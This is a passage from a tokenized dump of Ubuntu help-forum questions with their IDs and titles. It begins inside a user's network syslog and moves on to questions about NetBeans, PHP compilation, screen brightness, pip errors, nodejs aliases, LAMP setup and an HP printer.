:6ef0:49ff : feb9 : b17f . jun 6 10:38:20 lolbox avahi-daemon [ 619 ] : new relevant interface eth0.ipv6 for mdns . jun 6 10:38:20 lolbox avahi-daemon [ 619 ] : registering new address record for fe80 : :6ef0:49ff : feb9 : b17f on eth0.* . jun 6 10:38:21 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : device state change : ip-config - > secondaries ( reason 'none ' ) [ 70 90 0 ] jun 6 10:38:21 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) complete . jun 6 10:38:21 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : device state change : secondaries - > activated ( reason 'none ' ) [ 90 100 0 ] jun 6 10:38:21 lolbox networkmanager [ 862 ] : < info > networkmanager state is now connected_global jun 6 10:38:21 lolbox networkmanager [ 862 ] : < info > policy set 'wired connection 1 ' ( eth0 ) as default for ipv4 routing and dns . jun 6 10:38:21 lolbox networkmanager [ 862 ] : < info > writing dns information to /sbin/resolvconf jun 6 10:38:21 lolbox dnsmasq [ 1362 ] : setting upstream servers from dbus jun 6 10:38:21 lolbox dnsmasq [ 1362 ] : using nameserver 127.0.0.1 # 53 jun 6 10:38:21 lolbox dnsmasq [ 1362 ] : using nameserver 193.150.193.150 # 53 jun 6 10:38:21 lolbox dnsmasq [ 1362 ] : using nameserver 83.255.245.11 # 53 jun 6 10:38:21 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) successful , device activated . jun 6 10:38:21 lolbox whoopsie [ 1133 ] : message repeated 2 times : [ offline ] jun 6 10:38:21 lolbox whoopsie [ 1133 ] : online jun 6 10:38:21 lolbox ntpdate [ 13217 ] : ca n't find host ntp.ubuntu.com : name or service not known ( -2 ) jun 6 10:38:21 lolbox ntpdate [ 13217 ] : no servers can be used , exiting jun 6 10:38:22 lolbox dnsmasq [ 1138 ] : reading /var/run/dnsmasq/resolv.conf jun 6 10:38:22 lolbox dnsmasq [ 1138 ] : using nameserver 127.0.1.1 # 53 jun 6 10:38:22 lolbox dhclient : xmt : solicit on eth0 , interval 4080ms . jun 6 10:38:22 lolbox dhclient : rcv : advertise message on eth0 from fe80 : :120d:7fff : fe97:9d54 . jun 6 10:38:22 lolbox dhclient : ia_na status code noaddrsavail . jun 6 10:38:26 lolbox dhclient : xmt : solicit on eth0 , interval 8450ms . jun 6 10:38:26 lolbox dhclient : rcv : advertise message on eth0 from fe80 : :120d:7fff : fe97:9d54 . jun 6 10:38:26 lolbox dhclient : ia_na status code noaddrsavail . jun 6 10:38:35 lolbox dhclient : xmt : solicit on eth0 , interval 16630ms . jun 6 10:38:35 lolbox dhclient : rcv : advertise message on eth0 from fe80 : :120d:7fff : fe97:9d54 . jun 6 10:38:35 lolbox dhclient : ia_na status code noaddrsavail . jun 6 10:38:51 lolbox dhclient : xmt : solicit on eth0 , interval 34860ms . jun 6 10:38:51 lolbox dhclient : rcv : advertise message on eth0 from fe80 : :120d:7fff : fe97:9d54 . jun 6 10:38:51 lolbox dhclient : ia_na status code noaddrsavail . jun 6 10:38:58 lolbox dnsmasq [ 1138 ] : maximum number of concurrent dns queries reached ( max : 150 ) jun 6 10:38:58 lolbox dnsmasq [ 1362 ] : maximum number of concurrent dns queries reached ( max : 150 ) jun 6 10:39:04 lolbox networkmanager [ 862 ] : < warn > ( eth0 ) : dhcpv6 request timed out . jun 6 10:39:04 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : canceled dhcp transaction , dhcp client pid 13161 jun 6 10:39:04 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... jun 6 10:39:04 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... jun 6 10:39:04 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : device state change : activated - > failed ( reason 'ip-config-unavailable ' ) [ 100 120 5 ] jun 6 10:39:04 lolbox networkmanager [ 862 ] : < info > networkmanager state is now disconnected jun 6 10:39:04 lolbox networkmanager [ 862 ] : < warn > activation ( eth0 ) failed for connection 'wired connection 1' jun 6 10:38:22 lolbox whoopsie [ 1133 ] : online jun 6 10:39:04 lolbox whoopsie [ 1133 ] : offline jun 6 10:39:04 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . jun 6 10:39:04 lolbox dbus [ 485 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) jun 6 10:39:04 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] jun 6 10:39:04 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : deactivating device ( reason 'none ' ) [ 0 ] jun 6 10:39:04 lolbox dbus [ 485 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' jun 6 10:39:04 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : canceled dhcp transaction , dhcp client pid 13160 jun 6 10:39:04 lolbox avahi-daemon [ 619 ] : withdrawing address record for fe80 : :6ef0:49ff : feb9 : b17f on eth0 . jun 6 10:39:04 lolbox avahi-daemon [ 619 ] : leaving mdns multicast group on interface eth0.ipv6 with address fe80 : :6ef0:49ff : feb9 : b17f . jun 6 10:39:04 lolbox avahi-daemon [ 619 ] : interface eth0.ipv6 no longer relevant for mdns . jun 6 10:39:04 lolbox avahi-daemon [ 619 ] : withdrawing address record for 192.168.0.16 on eth0 . jun 6 10:39:04 lolbox avahi-daemon [ 619 ] : leaving mdns multicast group on interface eth0.ipv4 with address 192.168.0.16 . jun 6 10:39:04 lolbox avahi-daemon [ 619 ] : interface eth0.ipv4 no longer relevant for mdns . jun 6 10:39:04 lolbox networkmanager [ 862 ] : < warn > dns : plugin dnsmasq update failed jun 6 10:39:04 lolbox networkmanager [ 862 ] : < info > removing dns information from /sbin/resolvconf jun 6 10:39:04 lolbox dnsmasq [ 1362 ] : setting upstream servers from dbus jun 6 10:39:05 lolbox avahi-daemon [ 619 ] : joining mdns multicast group on interface eth0.ipv6 with address fe80 : :6ef0:49ff : feb9 : b17f . jun 6 10:39:05 lolbox avahi-daemon [ 619 ] : new relevant interface eth0.ipv6 for mdns . jun 6 10:39:05 lolbox avahi-daemon [ 619 ] : registering new address record for fe80 : :6ef0:49ff : feb9 : b17f on eth0.* . jun 6 10:39:06 lolbox dnsmasq [ 1138 ] : no servers found in /var/run/dnsmasq/resolv.conf , will retry jun 6 10:39:07 lolbox networkmanager [ 862 ] : < info > auto-activating connection 'wired connection 1 ' . jun 6 10:39:07 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) starting connection 'wired connection 1' jun 6 10:39:07 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] jun 6 10:39:07 lolbox networkmanager [ 862 ] : < info > networkmanager state is now connecting jun 6 10:39:07 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) scheduled ... jun 6 10:39:07 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) started ... jun 6 10:39:07 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) scheduled ... jun 6 10:39:07 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) complete . jun 6 10:39:07 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) starting ... jun 6 10:39:07 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] jun 6 10:39:07 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) successful . jun 6 10:39:07 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) scheduled . jun 6 10:39:07 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) complete . jun 6 10:39:07 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) started ... jun 6 10:39:07 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] jun 6 10:39:07 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) jun 6 10:39:07 lolbox networkmanager [ 862 ] : < info > dhclient started with pid 13270 jun 6 10:39:07 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) beginning dhcpv6 transaction ( timeout in 45 seconds ) jun 6 10:39:07 lolbox networkmanager [ 862 ] : < info > dhclient started with pid 13271 jun 6 10:39:07 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) complete . jun 6 10:39:07 lolbox avahi-daemon [ 619 ] : withdrawing address record for fe80 : :6ef0:49ff : feb9 : b17f on eth0 . jun 6 10:39:07 lolbox avahi-daemon [ 619 ] : leaving mdns multicast group on interface eth0.ipv6 with address fe80 : :6ef0:49ff : feb9 : b17f . jun 6 10:39:07 lolbox avahi-daemon [ 619 ] : interface eth0.ipv6 no longer relevant for mdns . jun 6 10:39:07 lolbox dhclient : internet systems consortium dhcp client 4.2.4 jun 6 10:39:07 lolbox dhclient : copyright 2004-2012 internet systems consortium . jun 6 10:39:07 lolbox dhclient : all rights reserved . jun 6 10:39:07 lolbox dhclient : for info , please visit https : //www.isc.org/software/dhcp/ jun 6 10:39:07 lolbox dhclient : jun 6 10:39:08 lolbox dhclient : internet systems consortium dhcp client 4.2.4 jun 6 10:39:08 lolbox dhclient : copyright 2004-2012 internet systems consortium . jun 6 10:39:08 lolbox dhclient : all rights reserved . jun 6 10:39:08 lolbox dhclient : for info , please visit https : //www.isc.org/software/dhcp/ jun 6 10:39:08 lolbox dhclient : jun 6 10:39:08 lolbox dhclient : bound to *:546 jun 6 10:39:08 lolbox dhclient : listening on socket/eth0 jun 6 10:39:08 lolbox dhclient : sending on socket/eth0 jun 6 10:39:08 lolbox kernel : [ 1446.098590 ] type=1400 audit ( 1402043948.002:75 ) : apparmor= '' denied '' operation= '' signal '' profile= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=13273 comm= '' nm-dhcp-client . '' requested_mask= '' send '' denied_mask= '' send '' signal=term peer= '' /sbin/dhclient '' jun 6 10:39:08 lolbox kernel : [ 1446.098599 ] type=1400 audit ( 1402043948.002:76 ) : apparmor= '' denied '' operation= '' signal '' profile= '' /sbin/dhclient '' pid=13273 comm= '' nm-dhcp-client . '' requested_mask= '' receive '' denied_mask= '' receive '' signal=term peer= '' /usr/lib/networkmanager/nm-dhcp-client.action '' jun 6 10:39:08 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : dhcpv4 state changed nbi - > preinit jun 6 10:39:08 lolbox dhclient : listening on lpf/eth0/6c : f0:49 : b9 : b1:7f jun 6 10:39:08 lolbox dhclient : sending on lpf/eth0/6c : f0:49 : b9 : b1:7f jun 6 10:39:08 lolbox dhclient : sending on socket/fallback jun 6 10:39:08 lolbox dhclient : dhcprequest of 192.168.0.16 on eth0 to 255.255.255.255 port 67 ( xid=0x3e0183b9 ) jun 6 10:39:08 lolbox dhclient : xmt : solicit on eth0 , interval 1050ms . jun 6 10:39:08 lolbox dhclient : send_packet6 : can not assign requested address jun 6 10:39:08 lolbox dhclient : dhc6 : send_packet6 ( ) sent -1 of 77 bytes jun 6 10:39:09 lolbox dhclient : dhcpack of 192.168.0.16 from 192.168.0.1 jun 6 10:39:09 lolbox dhclient : bound to 192.168.0.16 -- renewal in 35498 seconds . jun 6 10:39:09 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : dhcpv4 state changed preinit - > reboot jun 6 10:39:09 lolbox networkmanager [ 862 ] : < info > address 192.168.0.16 jun 6 10:39:09 lolbox networkmanager [ 862 ] : < info > prefix 24 ( 255.255.255.0 ) jun 6 10:39:09 lolbox networkmanager [ 862 ] : < info > gateway 192.168.0.1 jun 6 10:39:09 lolbox networkmanager [ 862 ] : < info > nameserver '83.255.245.11' jun 6 10:39:09 lolbox networkmanager [ 862 ] : < info > nameserver '193.150.193.150' jun 6 10:39:09 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... jun 6 10:39:09 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) started ... jun 6 10:39:09 lolbox avahi-daemon [ 619 ] : joining mdns multicast group on interface eth0.ipv4 with address 192.168.0.16 . jun 6 10:39:09 lolbox avahi-daemon [ 619 ] : new relevant interface eth0.ipv4 for mdns . jun 6 10:39:09 lolbox avahi-daemon [ 619 ] : registering new address record for 192.168.0.16 on eth0.ipv4 . jun 6 10:39:09 lolbox avahi-daemon [ 619 ] : joining mdns multicast group on interface eth0.ipv6 with address fe80 : :6ef0:49ff : feb9 : b17f . jun 6 10:39:09 lolbox avahi-daemon [ 619 ] : new relevant interface eth0.ipv6 for mdns . jun 6 10:39:09 lolbox avahi-daemon [ 619 ] : registering new address record for fe80 : :6ef0:49ff : feb9 : b17f on eth0.* . jun 6 10:39:10 lolbox dhclient : xmt : solicit on eth0 , interval 2180ms . jun 6 10:39:10 lolbox dhclient : rcv : advertise message on eth0 from fe80 : :120d:7fff : fe97:9d54 . jun 6 10:39:10 lolbox dhclient : ia_na status code noaddrsavail . jun 6 10:39:10 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : device state change : ip-config - > secondaries ( reason 'none ' ) [ 70 90 0 ] jun 6 10:39:10 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) complete . jun 6 10:39:10 lolbox networkmanager [ 862 ] : < info > ( eth0 ) : device state change : secondaries - > activated ( reason 'none ' ) [ 90 100 0 ] jun 6 10:39:10 lolbox networkmanager [ 862 ] : < info > networkmanager state is now connected_global jun 6 10:39:10 lolbox networkmanager [ 862 ] : < info > policy set 'wired connection 1 ' ( eth0 ) as default for ipv4 routing and dns . jun 6 10:39:10 lolbox networkmanager [ 862 ] : < info > writing dns information to /sbin/resolvconf jun 6 10:39:10 lolbox dnsmasq [ 1362 ] : setting upstream servers from dbus jun 6 10:39:10 lolbox dnsmasq [ 1362 ] : using nameserver 127.0.0.1 # 53 jun 6 10:39:10 lolbox dnsmasq [ 1362 ] : using nameserver 193.150.193.150 # 53 jun 6 10:39:10 lolbox dnsmasq [ 1362 ] : using nameserver 83.255.245.11 # 53 jun 6 10:39:10 lolbox networkmanager [ 862 ] : < info > activation ( eth0 ) successful , device activated . jun 6 10:39:10 lolbox whoopsie [ 1133 ] : message repeated 2 times : [ offline ] jun 6 10:39:10 lolbox whoopsie [ 1133 ] : online jun 6 10:39:10 lolbox ntpdate [ 13339 ] : ca n't find host ntp.ubuntu.com : name or service not known ( -2 ) jun 6 10:39:10 lolbox ntpdate [ 13339 ] : no servers can be used , exiting jun 6 10:39:11 lolbox dnsmasq [ 1138 ] : reading /var/run/dnsmasq/resolv.conf jun 6 10:39:11 lolbox dnsmasq [ 1138 ] : using nameserver 127.0.1.1 # 53 jun 6 10:39:12 lolbox dhclient : xmt : solicit on eth0 , interval 4350ms . jun 6 10:39:12 lolbox dhclient : rcv : advertise message on eth0 from fe80 : :120d:7fff : fe97:9d54 . jun 6 10:39:12 lolbox dhclient : ia_na status code noaddrsavail . jun 6 10:39:16 lolbox dhclient : xmt : solicit on eth0 , interval 8740ms . jun 6 10:39:16 lolbox dhclient : rcv : advertise message on eth0 from fe80 : :120d:7fff : fe97:9d54 . jun 6 10:39:16 lolbox dhclient : ia_na status code noaddrsavail . jun 6 10:39:17 lolbox dnsmasq [ 1138 ] : maximum number of concurrent dns queries reached ( max : 150 ) jun 6 10:39:17 lolbox dnsmasq [ 1362 ] : maximum number of concurrent dns queries reached ( max : 150 ) jun 6 10:39:25 lolbox dhclient : xmt : solicit on eth0 , interval 17610ms . jun 6 10:39:25 lolbox dhclient : rcv : advertise message on eth0 from fe80 : :120d:7fff : fe97:9d54 . jun 6 10:39:25 lolbox dhclient : ia_na status code noaddrsavail . /etc/networkmanager/networkmanager.conf : [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq # no-auto-default=6c : f0:49 : b9 : b1:7f , [ ifupdown ] managed=false /etc/network/interfaces : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback lshw -c network : ➜ ~ sudo lshw -c network *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 03 serial : 6c : f0:49 : b9 : b1:7f size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8168 driverversion=8.038.00-napi duplex=full latency=0 link=yes multicast=yes port=twisted pair speed=1gbit/s resources : irq:48 ioport : de00 ( size=256 ) memory : fbeff000-fbefffff memory : fbef8000-fbefbfff memory : fbe00000-fbe1ffff
477563	netbeans has broken interface with openjdk	sorry for english . usually ( say , at 4/5 of times ) , when i start netbeans , interface is partially broken . for example , menu items are appearing and at once disappearing after click ; some parts of editor are also blocked for cursor actions . another issue is broken options window - i can show it only once for netbeans execution . there are more similar issues . $ java -version java version `` 1.7.0_55 '' openjdk runtime environment ( icedtea 2.4.7 ) ( 7u55-2.4.7-1ubuntu1~0.13.10.1 ) openjdk 64-bit server vm ( build 24.51-b03 , mixed mode ) version of netbeans is 7.0.1 . linux version is mint 16 . i use mate . i had the same issue at other computer , at the same operating system . i know that installing sun version of java could help , but i also know that there should n't be such issue with openjdk . also , i had other problem with netbeans and sun java 8 - netbeans suddenly crashed before he fully started , so i want to stick with openjdk . what causes my problem ? should i use other version of netbeans/openjdk ?
477565	apache2 + php + pthreads howtos	04 lts 64 bit . what i would really love to do is sudo apt-get install libapache2-mod-php5 but compile php with -- enable-maintainer-zts so i could later install pthreads with pecl install pthreads . sadly i understand that it is not possible . i know that the easiest way is to recompile php together with apache support and zts . however i really like the way the standard ubuntu php package is configured and i am used to the path`s for cli php.ini config , apache php.ini config and other paths for modules and files that this ubuntu package defines . so i just want to change the package source a little bit and install it . # get the stuff necessary to build the package sudo apt-get build-dep php5-common # get the package source sudo apt-get source php5-common at this point i am getting sources not for the php5-common package but the whole php5 package . if i would sudo make & & make install at this point , would it mean that i am installing a lot of unnecessary stuff ? # add configuration options ./configure -- enable-maintainer-zts does this mean that i am appending a configuration option ? or am i generating a whole new config ? alternative at this point is there a way of getting the config options that this package defines , so that i can grab a php source from php.net and compile it with $ ./configure -- prefix=package_prefix \ // option 1 from package -- enable-embed \ // option 2 from package -- with-regex=php \ // option 3 from package continuing the main idea ... solution 1 # compile ( not compiling ) sudo make & & make install will i be building php with everything at this point ? if i compile like this , i will not be able to remove the mess i made using sudo apt-get purge php5 ? solution 2 # recompile the package dpkg-buildpackage -rfakeroot -uc -b this does not compile also . please correct my steps , so i can install everything correctly .
477569	max brightness in ubuntu lower when compared to windows	i 've installed ubuntu 14.04 on my ( new ) thinkpad edge330 . everything worked quite well so far . i 've noticed that the screen was n't that bright and was a bit disappointed of the thinkpad , but then i realized that the brightness was much better on a parallel windows 7 installation i did later on . i already used this tip : max brightness on netbook i did increase the brightness to an acceptable level ( could be the actual max . brightness , or is there a way to increase it even further ? ) but now unfortunately i can not change the screen brightness at all anymore . not by using the fn keys or in the system settings . actually i just fixed it , by adding the options suggested in max brightness on netbook creating a file : /usr/share/x11/xorg.conf.d/20-intel.conf with the content : section `` device '' identifier `` card0 '' driver `` intel '' option `` backlight '' `` intel_backlight '' busid `` pci:0:2:0 '' endsection now everything works quite well , i can access the maximum brightness , brightness control works and additionally i can switch of the screen completely ( this was not possible before )
477573	how to create a bootable clonezilla usb with tuxboot that work ?	i 'm trying to create a bootable clonezilla usb with tuxboot , the application that is recommended by clonezilla site . i installed it via ubuntu ppa and follow the instructions on the site to put files on usb . everything went well and then i restarted the system . now when i 'm trying to boot from usb it says : `` this is not a bootable disk . please insert a bootable floppy and press any key to try again ... '' what is causing this problem ? i really appreciate any help you can provide . my laptop model is dell studio-1558 and i 'm running ubuntu 14.04
477574	'module ' object has no attribute 'py2 '	i am using ubuntu 14.04 , was trying to install python-memcache . i have got an error like downloading/unpacking python-memcached downloading python-memcached-1.53.tar.gz cleaning up ... exception : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/pip/basecommand.py '' , line 122 , in main status = self.run ( options , args ) file `` /usr/lib/python2.7/dist-packages/pip/commands/install.py '' , line 278 , in run requirement_set.prepare_files ( finder , force_root_egg_info=self.bundle , bundle=self.bundle ) file `` /usr/lib/python2.7/dist-packages/pip/req.py '' , line 1229 , in prepare_files req_to_install.run_egg_info ( ) file `` /usr/lib/python2.7/dist-packages/pip/req.py '' , line 292 , in run_egg_info logger.notify ( 'running setup.py ( path : % s ) egg_info for package % s ' % ( self.setup_py , self.name ) ) file `` /usr/lib/python2.7/dist-packages/pip/req.py '' , line 284 , in setup_py if six.py2 and isinstance ( setup_py , six.text_type ) : attributeerror : 'module ' object has no attribute 'py2' storing debug log for failure in /home/mani/.pip/pip.log i am getting the same error when installing django-celery , pymongo etc
477576	before i install a program from software centre it asks me to remove files	when i click on install button in the software centre , this small window pops up : why is this suddenly happening ? how do i disable repositories ? how do i make this go away , to be able to work normally ? i am on ubuntu 14.04 lts
477577	alias of nodejs as node on 14.04	i installed nodejs with apt-get on 14.04 when i do nodejs -v v0.10.25 and when i do node -v node : command not found . so i want to make alias of nodejs as node so i inserted a line in ~/.bashrc alias node=nodejs now i can access the nodejs with node on terminal . but in my project , i use grunt which fires nodemon via gruntfile.js . now nodemon tries to run node instead of nodejs now again i get the same problem node : command not found . means alias was not made for non-interactive shell non-login shell . where should i make the alias for this specific purpose and get my problem solved ?
477578	unity graphics glitches hovering over items	i 'm using 14:04 which is pretty nice . something wionders me : if i open a window ( e.g . ubuntu software centre ) i can see some items ( sometimes nothing ) but by hovering the mouse over it it appears - and then disappears again . sometimes the side mover acts the same way ... maybe it has to do with my hardware : p4 , 3 ghz , 2 gb ram , older graphics board , kvm-switch ? there 's no difference whether i use gnome , ubuntu standard , ubuntu classic , ubuntu fallback ... thanks for hints jens
477581	could not write bytes : broken pipe - looking for log of removed packages	i have a dual boot system with 12.04 and windows 7 . ubuntu worked fine yesterday but this morning upon boot i get subject . searched the forums and unsuccessful with recovery . i tried : sudo gedit /var/log/apt/history.log to see the log of removed packages , but get the following : ** ( gedit:976 ) : warning ** : command line 'dbus-launch -- autolaunch=2d7d18532e9953bc8a2b852e00000007 -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : autolaunch error : x11 initialization failed.\n can not open display : run 'gedit -- help ' to see a full list of available command line options . anyone have any suggestions for a fix ? please let me know if you require any additional information . problem solved . 1 . go to recovery mode / 2 . in recovery mode enable networking / 3 . in recovery mode select drop to shell / 4 . in shell sudo apt-get install xserver-xorg-core xserver-xorg / 5 . in shell dpkg-reconfigure xserver-xorg / 6 . exit bash and return to recovery menu , select normal boot . thanks to everyone for their suggestions . m
477582	i accidently locked some packages in synaptic , how can i undo these ?	if possible i would like to list them first and select which one to remove or remove them all . ubuntu 13.10 and ubuntu 14.04 . thanks .
477586	ubuntu is running in low graphic mode	when i was installing skype in my laptop and it did n't work i used this command : sudo apt-get remove libqt4-dbus libqt4-network libqt4-xml libasound2 and then ubuntu change and running in low graphic mode . i did try what you recommend for low graphic in your website but receive : failed to start or connect to required pax service what can i do ? help me please .
477589	error in lamp installing in ubuntu	this is the error message shown while installing lamp *module mpm_event disabled . enabling module mpm_prefork . apache2_switch_mpm switch to prefork * restarting web server apache2 ah00558 : apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 . set the 'servername ' directive globally to suppress this message [ ok ] apache2_invoke : enable module php5 * restarting web ser ver apache2 ah00558 : apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 . set the 'servername ' directive globally to suppress this message [ ok ] errors were encountered while processing : php5-mysql javascript-common phpmyadmin e : sub-process /usr/bin/dpkg returned an error code ( 1 ) *
477590	compiz expo curve artifacts issue	when viewing the expo workspaces with `` curve '' deformation , there is an awfully glitchy looking and colorful artifact around the edges of the selected worspace . in addition , the workspace rectangles themselves do n't actually curve like they used to on 12.04 ; although they do tilt inward , they 're totally flat . ( it was cooler before . ) os : ubuntu 14.04 gpu : amd sapphire 270x i recently switched to xubuntu , but this has not had any effect on the issue . purely visual annoyance . is anyone else seeing this ?
477592	hp laserjet 1536dnf mfp	hp laserjet printer working over the network from the mfp 1536dnf am writing but does not print . however , i can use the scanner . i did not have any troubles on ubuntu 13.10 , but when 覺 got on ubuntu 14.04 , there was some troubles about printing in the window that appears after you execute this command `` send test page to printer '' option i did . hp-setup -g 192.168.1.40 hp linux imaging and printing system ( ver . 3.14.6 ) printer/fax setup utility ver . 9.0 copyright ( c ) 2001-13 hewlett-packard development company , lp this software comes with absolutely no warranty . this is free software , and you are welcome to distribute it under certain conditions . see copying file for more details . hp-setup [ 12560 ] : debug : param=192.168.1.40 hp-setup [ 12560 ] : debug : selected_device_name=none hp-setup [ 12560 ] : debug : sys.argv= [ '/usr/bin/hp-setup ' , '-g ' , '192.168.1.40 ' ] printer_name=none param=192.168.1.40 jd_port=1 device_uri=none remove=false searching for device ... hp-setup [ 12560 ] : debug : cache miss : hp_laserjet_m1536dnf_mfp hp-setup [ 12560 ] : debug : reading file : /usr/share/hplip/data/models/models.dat hp-setup [ 12560 ] : debug : searching for section [ hp_laserjet_m1536dnf_mfp ] in file /usr/share/hplip/data/models/models.dat hp-setup [ 12560 ] : debug : found section [ hp_laserjet_m1536dnf_mfp ] in file /usr/share/hplip/data/models/models.dat found device : hp : /net/hp_laserjet_m1536dnf_mfp ? ip=192.168.1.40 hp-setup [ 12560 ] : debug : getting host name from ip address ( 192.168.1.40 ) hp-setup [ 12560 ] : debug : starting gui loop ... hp-setup [ 12560 ] : debug : /usr/share/hplip/scan/plugins/bb_marvell.so library file present . hp-setup [ 12560 ] : debug : /usr/share/hplip/scan/plugins/bb_marvell.so library status : 1 hp-setup [ 12560 ] : debug : /usr/share/hplip/scan/plugins/bb_soap.so library file present . hp-setup [ 12560 ] : debug : /usr/share/hplip/scan/plugins/bb_soap.so library status : 1 hp-setup [ 12560 ] : debug : /usr/share/hplip/scan/plugins/bb_soapht.so library file present . hp-setup [ 12560 ] : debug : /usr/share/hplip/scan/plugins/bb_soapht.so library status : 1 hp-setup [ 12560 ] : debug : /usr/share/hplip/fax/plugins/fax_marvell.so library file present . hp-setup [ 12560 ] : debug : /usr/share/hplip/fax/plugins/fax_marvell.so library status : 1 hp-setup [ 12560 ] : debug : /usr/share/hplip/prnt/plugins/hbpl1.so library file present . hp-setup [ 12560 ] : debug : /usr/share/hplip/prnt/plugins/hbpl1.so library status : 1 hp-setup [ 12560 ] : debug : /usr/share/hplip/prnt/plugins/lj.so library file present . hp-setup [ 12560 ] : debug : /usr/share/hplip/prnt/plugins/lj.so library status : 1 hp-setup [ 12560 ] : debug : /usr/share/hplip/scan/plugins/bb_marvell.so library file present . hp-setup [ 12560 ] : debug : /usr/share/hplip/scan/plugins/bb_marvell.so library status : 1 hp-setup [ 12560 ] : debug : /usr/share/hplip/scan/plugins/bb_soap.so library file present . hp-setup [ 12560 ] : debug : /usr/share/hplip/scan/plugins/bb_soap.so library status : 1 hp-setup [ 12560 ] : debug : /usr/share/hplip/scan/plugins/bb_soapht.so library file present . hp-setup [ 12560 ] : debug : /usr/share/hplip/scan/plugins/bb_soapht.so library status : 1 hp-setup [ 12560 ] : debug : /usr/share/hplip/fax/plugins/fax_marvell.so library file present . hp-setup [ 12560 ] : debug : /usr/share/hplip/fax/plugins/fax_marvell.so library status : 1 hp-setup [ 12560 ] : debug : /usr/share/hplip/prnt/plugins/hbpl1.so library file present . hp-setup [ 12560 ] : debug : /usr/share/hplip/prnt/plugins/hbpl1.so library status : 1 hp-setup [ 12560 ] : debug : /usr/share/hplip/prnt/plugins/lj.so library file present . hp-setup [ 12560 ] : debug : /usr/share/hplip/prnt/plugins/lj.so library status : 1 hp-setup [ 12560 ] : debug : { } hp-setup [ 12560 ] : debug : hp_laserjet_m1536dnf_mfp hp-setup [ 12560 ] : debug : ( cups 1.2.x ) getting list of ppds using cups_get_ppds ... hp-setup [ 12560 ] : debug : cups ppd base path = /usr/share/cups/model hp-setup [ 12560 ] : debug : foomatic ppd base path = /usr/share/ppd hp-setup [ 12560 ] : debug : matching ppd list to model laserjet_m1530_mfp_series ... hp-setup [ 12560 ] : debug : found match : lsb/usr/hp/hp-laserjet_m1530_mfp_series-ps.ppd.gz hp-setup [ 12560 ] : debug : [ ( 'lsb/usr/hp/hp-laserjet_m1530_mfp_series-ps.ppd.gz ' , [ 'ps ' ] ) ] hp-setup [ 12560 ] : debug : one match found . hp-setup [ 12560 ] : debug : { } hp-setup [ 12560 ] : debug : searching for fax ppd for model hp_laserjet_m1536dnf_mfp hpcups_build =1 hp-setup [ 12560 ] : debug : ppds= [ '/usr/share/ppd/hp/hp-fax3-hpcups.ppd.gz ' , '/usr/share/ppd/hp/hp-fax2-hpcups.ppd.gz ' , '/usr/share/ppd/hp/hp-fax-hpcups.ppd.gz ' , '/usr/share/ppd/hp/hp-fax4-hpcups.ppd.gz ' ] hp-setup [ 12560 ] : debug : found fax ppd : 